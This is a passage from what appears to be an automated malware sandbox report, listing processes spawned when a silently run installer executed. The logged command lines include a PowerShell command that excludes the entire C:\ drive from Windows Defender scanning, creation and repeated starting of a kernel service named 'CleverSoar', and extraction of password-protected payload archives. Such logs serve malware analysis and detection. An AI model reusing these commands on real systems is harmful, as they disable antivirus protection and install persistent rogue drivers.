                        Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                        Imagebase:0x7ff788560000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:03:45:08
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:03:45:12
                        Start date:22/12/2024
                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Imagebase:0x7ff693ab0000
                        File size:496'640 bytes
                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:5
                        Start time:03:45:13
                        Start date:22/12/2024
                        Path:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
                        Imagebase:0xca0000
                        File size:5'694'753 bytes
                        MD5 hash:44728E21199D2B04A4B25798625AC86E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:low
                        Has exited:false

                        Target ID:6
                        Start time:03:45:14
                        Start date:22/12/2024
                        Path:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043C,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
                        Imagebase:0x5f0000
                        File size:3'366'912 bytes
                        MD5 hash:CCFB5265302C0ED10D4EE3C9C00B07B1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:7
                        Start time:03:45:16
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:03:45:16
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:03:45:16
                        Start date:22/12/2024
                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                        Wow64 process (32bit):true
                        Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                        Imagebase:0x180000
                        File size:831'200 bytes
                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Has exited:true

                        Target ID:10
                        Start time:03:45:16
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:11
                        Start time:03:45:16
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:12
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                        Wow64 process (32bit):true
                        Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                        Imagebase:0x180000
                        File size:831'200 bytes
                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:13
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:14
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:15
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:16
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:17
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:18
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:19
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:20
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:21
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:22
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:23
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:24
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:25
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:26
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:27
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:28
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:29
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:30
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:31
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:32
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:33
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:34
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:35
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:36
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:37
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:38
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:39
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:40
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:41
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:42
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:43
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:44
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:45
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:46
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:47
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:48
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:49
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:50
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:51
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:52
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:53
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:54
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:55
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:56
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:57
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:58
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:59
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:60
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:61
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:62
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:63
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:64
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:65
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:66
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:67
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:68
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:69
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
